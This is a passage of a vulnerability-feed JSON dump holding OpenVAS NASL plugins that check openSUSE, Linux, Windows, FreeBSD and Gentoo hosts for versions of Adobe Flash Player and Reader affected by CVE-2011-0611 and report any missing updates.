Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.2, openSUSE 11.3\";\ntag_insight = \"Specially crafted Flash files as delivered by web sites\n or as .swf-files could exploit the flash player to execute arbitrary code\n with the privileges of the user viewing these files.\n CVE-2011-0611 has been assigned to this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_id(850162);\n script_version(\"$Revision: 8041 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 08:28:21 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:44:44 +0200 (Fri, 22 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2011-018\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2011:018\");\n\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310850162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850162", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SA:2011:018)", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850162\");\n script_version(\"2020-01-31T08:40:24+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:40:24 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:44:44 +0200 (Fri, 22 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"SUSE-SA\", value:\"2011-018\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SA:2011:018)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.2|openSUSE11\\.3)\");\n\n script_tag(name:\"impact\", value:\"remote code execution\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.2, openSUSE 11.3\");\n\n script_tag(name:\"insight\", value:\"Specially crafted Flash files as delivered by web sites\n or as .swf-files could exploit the flash player to execute arbitrary code\n with the privileges of the user viewing these files.\n CVE-2011-0611 has been assigned to this issue.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.2.159.1~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:22:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310801922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801922", "type": "openvas", "title": "Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801922\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to corrupt memory\nand execute arbitrary code on the system with elevated privileges.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.2.153.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling 'SWF' file in adobe flash\nplayer, which allows attackers to execute arbitrary code or cause a denial\nof service via crafted flash content.\");\n script_tag(name:\"solution\", value:\"Upgrade adobe flash player to version 10.2.159.1 or later,\nUpdate Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later.\");\n script_tag(name:\"summary\", value:\"This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\nif(flashVer)\n{\n if(version_is_less_equal(version:flashVer, test_version:\"10.2.153.1\")){\n report = report_fixed_ver(installed_version:flashVer, vulnerable_range:\"Less than or equal to 10.2.153.1\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "This host has Adobe Acrobat or Adobe Reader or Adobe flash Player installed\n and is prone to code execution vulnerability.", "modified": "2020-05-28T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:1361412562310801921", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801921", "type": "openvas", "title": "Adobe Products Arbitrary Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Products Arbitrary Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801921\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_name(\"Adobe Products Arbitrary Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Acrobat or Adobe Reader or Adobe flash Player installed\n and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling 'SWF' file in adobe flash player and\n 'Authplay.dll' in Adobe acrobat/reader. which allows attackers to execute\n arbitrary code or cause a denial of service via crafted flash content.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to corrupt memory and execute\n arbitrary code on the system with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.2.153.1 and prior on Windows.\n\n Adobe Reader/Acrobat version 9.x to 9.4.3 and 10.x to 10.0.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade adobe flash player to version 10.2.159.1 or later,\n Update Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\",\n \"cpe:/a:adobe:flash_player\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == \"cpe:/a:adobe:acrobat_reader\" || cpe == \"cpe:/a:adobe:acrobat\") {\n if(version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.4.3\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.2\")){\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.4.4 or 10.0.3\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_is_less_equal(version:vers, test_version:\"10.2.153.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"10.2.159.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69593", "href": "http://plugins.openvas.org/nasl.php?oid=69593", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 32b05547-6913-11e0-bdc4-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 32b05547-6913-11e0-bdc4-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f10-flashplugin\n\nCVE-2011-0611\nAdobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and\nSolaris and 10.2.156.12 and earlier on Android; Adobe AIR before\n2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader\n9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow\nremote attackers to execute arbitrary code or cause a denial of\nservice (application crash) via crafted Flash content; as demonstrated\nby a Microsoft Office document with an embedded .swf file that has a\nsize inconsistency in a 'group of included constants,' object type\nconfusion, ActionScript that adds custom functions to prototypes, and\nDate objects; and as exploited in the wild in April 2011.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/advisories/apsa11-02.html\nhttp://www.vuxml.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(69593);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.2r159.1\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2019-03-12T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:136141256231069593", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069593", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_linux-flashplugin14.nasl 14117 2019-03-12 14:02:42Z cfischer $\n#\n# Auto generated from VID 32b05547-6913-11e0-bdc4-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69593\");\n script_version(\"$Revision: 14117 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 15:02:42 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0611\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n linux-flashplugin\n\n linux-f10-flashplugin\n\nCVE-2011-0611\nAdobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and\nSolaris and 10.2.156.12 and earlier on Android, Adobe AIR before\n2.6.19140, and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader\n9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x\nbefore 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow\nremote attackers to execute arbitrary code or cause a denial of\nservice (application crash) via crafted Flash content as demonstrated\nby a Microsoft Office document with an embedded .swf file that has a\nsize inconsistency in a 'group of included constants, ' object type\nconfusion, ActionScript that adds custom functions to prototypes, and\nDate objects and as exploited in the wild in April 2011.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.2r159.1\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-11.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70774", "href": "http://plugins.openvas.org/nasl.php?oid=70774", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=354207\nhttp://bugs.gentoo.org/show_bug.cgi?id=359019\nhttp://bugs.gentoo.org/show_bug.cgi?id=363179\nhttp://bugs.gentoo.org/show_bug.cgi?id=367031\nhttp://bugs.gentoo.org/show_bug.cgi?id=370215\nhttp://bugs.gentoo.org/show_bug.cgi?id=372899\nhttp://bugs.gentoo.org/show_bug.cgi?id=378637\nhttp://bugs.gentoo.org/show_bug.cgi?id=384017\nhttp://www.adobe.com/support/security/advisories/apsa11-01.html\nhttp://www.adobe.com/support/security/advisories/apsa11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-12.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-13.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-21.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-26.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\";\n\n \n \nif(description)\n{\n script_id(70774);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", \"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", 